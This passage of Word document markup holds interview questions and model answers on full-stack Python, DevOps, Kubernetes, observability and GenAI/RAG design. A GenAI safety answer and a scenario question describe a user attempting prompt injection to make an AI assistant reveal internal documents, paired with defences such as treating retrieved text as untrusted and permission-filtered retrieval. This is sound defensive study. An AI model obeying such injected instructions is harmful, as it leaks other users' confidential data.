        <w:t>A: Prioritize arrays/strings, hash maps, two pointers, sliding window, stacks, queues/deque, binary search, trees, graphs, heaps, recursion, and basic dynamic programming. Practice by solving pattern-based problems in Python, writing complexity analysis, and explaining tradeoffs out loud. For full-stack roles, DSA matters less than competitive programming depth but still proves problem solving, clean coding, and ability to reason about performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you solve a coding problem during a Python interview while explaining complexity and tradeoffs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Coding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Clarify inputs, outputs, constraints, and edge cases first. Explain a brute-force approach and complexity, then look for a better pattern such as hashing, two pointers, sliding window, binary search, heap, graph traversal, or DP. Code a clear Python solution with meaningful names, test it on normal and edge cases, then summarize time and space complexity. If there are tradeoffs, explain readability versus performance and when each version is acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you Dockerize a full-stack Python application with separate frontend, backend, database, and worker services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevOps/Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use separate Dockerfiles for frontend and backend, with small production images, pinned dependencies, non-root users, and health checks. Use docker-compose for local development with services for frontend, backend, PostgreSQL, Redis, and workers. Backend and worker can share the same image but run different commands. Keep secrets in environment variables or secret stores, mount code only in development, and use migrations as an explicit release step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you design a CI/CD pipeline for a full-stack Python application from pull request to production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevOps/CI-CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: On pull request, run formatting, linting, unit tests, frontend tests, backend tests, type checks, dependency scanning, and Docker builds. On merge, build immutable images, scan them, push to a registry, run integration tests against a test environment, and deploy to staging. Production should use approvals, database migration checks, smoke tests, progressive rollout, deployment markers, and rollback. The same artifact should be promoted across environments rather than rebuilt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you deploy a Python backend, frontend, background worker, and database dependencies on Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevOps/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Deploy the backend as a Deployment and Service with readiness/liveness probes, resource requests, HPA, ConfigMaps, and Secrets. Deploy workers separately so they scale based on queue depth. Serve frontend as static assets via CDN/object storage or as a container behind ingress. Use managed PostgreSQL where possible, Redis/Memorystore for cache/queue support, and Kubernetes Jobs for migrations. Add ingress/TLS, network policies, service accounts, observability, and rollout strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What monitoring, logging, tracing, alerts, and runbooks would you add for a production full-stack app?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/SRE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Monitor request rate, errors, latency, saturation, frontend errors, API dependencies, database latency, queue depth, worker failures, cache hit rate, and business KPIs. Add structured logs with request IDs and user/tenant context where safe, OpenTelemetry traces from frontend/API/DB/external calls, and dashboards for service health and releases. Alerts should focus on user impact and SLO burn, with runbooks that explain diagnosis, mitigation, rollback, and escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you add a GenAI chat feature to a full-stack Python application using RAG?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build a backend endpoint that receives the user question, retrieves relevant documents from a vector database, constructs a prompt with context and guardrails, calls the LLM, and returns an answer with citations. Add an ingestion pipeline for documents: parse, chunk, embed, store vectors, and track metadata. The frontend should show streaming responses, sources, loading/error states, and feedback buttons. Add auth, tenant isolation, rate limits, logging, evaluation, and cost controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you design prompt templates, embeddings, vector search, citations, and response streaming in Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Backend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Version prompt templates like code and keep system instructions, retrieved context, and user input clearly separated. Generate embeddings during ingestion and query time using the same model family, store vectors with metadata, and retrieve top-k chunks using similarity plus filters. Include source IDs in context so the answer can cite documents. For UX, stream tokens from the backend to the frontend using SSE or WebSockets while preserving trace IDs and safety checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How would you protect a GenAI feature from prompt injection, data leakage, hallucinations, and unsafe tool calls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Safety</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Treat user input and retrieved documents as untrusted. Keep system instructions separate, restrict what context is retrieved by tenant and permission, redact secrets/PII, and validate tool calls against an allowlist with least privilege. Require citations for knowledge-grounded answers, use output validation for structured responses, add refusal behavior for unsafe requests, and log enough metadata to investigate issues without storing sensitive prompts unnecessarily.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How would you monitor GenAI quality, latency, token cost, retrieval quality, and user feedback in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Operations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Track latency by stage: retrieval, reranking, LLM call, and streaming. Log token counts, model version, prompt version, retrieved document IDs, cache hit rate, errors, and cost per feature. Measure retrieval quality with offline evaluation sets and production feedback such as thumbs up/down, citation clicks, and escalation rates. Add alerts for cost spikes, latency regressions, model errors, empty retrieval, and quality regression after prompt or model changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Design a full-stack AI resume analyzer using Python, React, PostgreSQL, object storage, queues, and an LLM API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use React for upload, progress, results, and feedback. The Python API creates an upload record, returns a signed URL for object storage, and enqueues parsing/analysis after upload. Workers extract text, store structured resume data in PostgreSQL, call embeddings or LLM APIs for scoring and suggestions, and write results back with status updates. Add authentication, per-user access control, file scanning, PII protection, rate limits, retries, observability, and a clear audit trail for generated recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. What 90-day learning plan would make someone interview-ready for full-stack Python, DSA, DevOps, and GenAI roles?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Career/Interview Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Days 1-30: Python fundamentals, FastAPI/Django, SQL/PostgreSQL, REST APIs, Git, testing, and core DSA patterns. Days 31-60: build and deploy a full-stack app with React, Docker, CI/CD, Redis, queues, observability, and Kubernetes or Cloud Run. Days 61-90: add GenAI/RAG features, vector search, prompt evaluation, security guardrails, and production monitoring. Throughout, practice DSA daily, write project READMEs, prepare system-design stories, and rehearse explaining tradeoffs clearly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 56 - Scenario-Based System Design for Full Stack Python and GenAI Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Scenario: Your Python API suddenly receives 10x traffic after a product launch. How would you redesign the system for scale and reliability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First stabilize: check error rate, latency, CPU/memory, DB pool saturation, queue depth, and autoscaling. Add horizontal replicas, tune Gunicorn/Uvicorn workers, increase database pool carefully, and enable caching for hot reads. Then redesign for sustained load: stateless API behind a load balancer, Redis cache, async workers for slow tasks, rate limits, backpressure, read replicas if needed, autoscaling based on real metrics, and SLO-based alerts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Scenario: A PostgreSQL-backed Python application has slow searches and frequent lock waits. How would you investigate and redesign it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Inspect slow query logs, pg_stat_activity, pg_stat_statements, explain plans, lock waits, missing indexes, N+1 ORM queries, and transaction duration. Short term, add or fix indexes, reduce transaction scope, paginate queries, and kill/avoid runaway queries. Long term, redesign search with proper full-text indexes or a search engine, separate read/write paths, use background jobs for heavy updates, and make migrations safer with online patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Scenario: A dashboard endpoint is slow because it recalculates expensive reports on every request. How would you design caching and background refresh?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Caching</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Move expensive calculation out of the request path. Use a scheduled worker or event-driven job to precompute report snapshots, store them in PostgreSQL or Redis, and serve the dashboard from cached data. Add TTLs, versioned cache keys, invalidation on relevant data changes, and a stale-while-revalidate pattern if freshness can be slightly delayed. Monitor cache hit rate, refresh failures, data age, and report generation latency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Scenario: Users upload large files and the API times out while processing them. How would you redesign the upload and processing flow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Queues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use signed URLs so users upload directly to object storage instead of sending large files through the API. The API creates metadata and returns an upload target, then a storage event or explicit finalize call enqueues processing. Workers validate, scan, parse, transform, and update status asynchronously. The frontend polls or subscribes for status. Add file size/type limits, retries, dead-letter queues, virus scanning, encryption, and per-user access checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Scenario: A full-stack Python app has manual deployments and frequent production regressions. How would you design the CI/CD and release process?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create a pipeline that runs linting, formatting, unit tests, integration tests, frontend tests, security scans, image builds, and migration checks on pull requests. On merge, build immutable artifacts, deploy to staging, run smoke tests, then promote the same artifacts to production with approval and progressive rollout. Add feature flags, rollback, deployment markers, database migration safety, release notes, and production monitoring gates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Scenario: Your Kubernetes deployment has intermittent 502 errors during rolling updates. How would you debug and fix the rollout design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check ingress/load balancer backend health, pod readiness, termination logs, preStop hooks, graceful shutdown, readiness probe behavior, and whether traffic reaches pods before they are ready or after shutdown starts. Fix with correct readiness probes, startup probes for slow apps, preStop delay, terminationGracePeriodSeconds, connection draining, maxUnavailable 0 or low, sufficient replicas, PodDisruptionBudget, and backward-compatible releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Scenario: Customers report errors, but logs are hard to correlate across frontend, backend, workers, and database calls. How would you redesign observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Introduce a correlation/request ID generated at the edge or frontend and propagate it through API calls, worker jobs, logs, traces, and downstream requests. Use structured JSON logs with service, env, version, user or tenant context where safe, and error codes. Add OpenTelemetry tracing across frontend/backend/DB/external calls, metrics for golden signals, dashboards by user journey, and alert runbooks that link to traces and logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Scenario: A multi-tenant SaaS app accidentally exposes one customer's data to another customer. How would you respond and redesign tenant isolation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First contain the incident: disable the affected path, preserve logs, identify impacted tenants/data, notify stakeholders, and rotate credentials if needed. Redesign by enforcing tenant_id at the data model and query layer, adding authorization checks server-side, using row-level security where appropriate, and preventing tenant IDs from being trusted from the client. Add tests for cross-tenant access, audit logs, scoped caches, and security review for every data access pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Scenario: The frontend feels slow even though backend latency looks healthy. How would you investigate and improve end-user performance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Measure real user metrics: LCP, INP, CLS, JS bundle size, API waterfall, browser errors, CDN/cache behavior, and client rendering time. Backend latency may be fine while frontend is blocked by large bundles, sequential API calls, slow hydration, inefficient rendering, or poor caching. Improve with code splitting, CDN caching, image optimization, fewer round trips, optimistic UI where safe, pagination/virtualization, and frontend monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Scenario: A GenAI chat feature gives outdated or irrelevant answers from your knowledge base. How would you debug and redesign the RAG pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/GenAI RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Break the pipeline into ingestion, chunking, embedding, indexing, retrieval, reranking, prompt construction, and generation. Check whether source documents are fresh, chunks are too large/small, embeddings match the query domain, metadata filters are correct, and top-k results are relevant. Add retrieval evaluation sets, citations, recency metadata, document reindexing, hybrid search if needed, reranking, and feedback loops for bad answers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Scenario: A user tries prompt injection to make your AI assistant reveal internal documents. How would you prevent and monitor this?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/GenAI Safety</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Treat all user input and retrieved text as untrusted. Enforce authorization before retrieval, isolate tenants, keep system instructions separate, filter retrieved documents by permission, and never put secrets or hidden policies in retrievable content. Add prompt-injection classifiers or rules, tool allowlists, output checks, refusal behavior, and audit logs. Monitor blocked attempts, unusual retrieval patterns, sensitive-document access, and user reports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Scenario: Your LLM API cost increases 5x after adding a new AI feature. How would you investigate and optimize cost without hurting quality?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/GenAI Cost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Break cost down by feature, tenant, model, prompt version, token input/output, retrieval size, retries, and cache hit rate. Find whether prompt length, context size, traffic, model choice, or repeated queries caused the spike. Optimize with shorter prompts, smaller models for simple tasks, response length limits, semantic caching, better retrieval top-k, batching where possible, rate limits, and quality evaluations before changing models.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Scenario: A third-party payment or email API is unreliable. How would you design retries, fallbacks, idempotency, and user experience?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Resilience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Set strict timeouts and retry transient failures with exponential backoff and jitter. Use idempotency keys so repeated requests do not double charge or duplicate messages. Put operations on a durable queue when user-facing latency should not wait for the provider. Add provider-specific circuit breakers, dead-letter queues, status tracking, reconciliation jobs, and user messages that are honest: pending, retrying, failed, or completed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Scenario: A background worker pipeline falls behind and queue depth keeps growing. How would you debug and redesign it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Data Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check arrival rate versus processing rate, worker errors, retry storms, poison messages, dependency latency, CPU/memory, DB locks, and queue visibility timeout. Short term, scale workers, pause noisy producers, and isolate poison messages. Long term, partition queues by priority, add backpressure/rate limits, improve task idempotency, batch safe operations, tune concurrency, autoscale on queue age, and add dead-letter handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
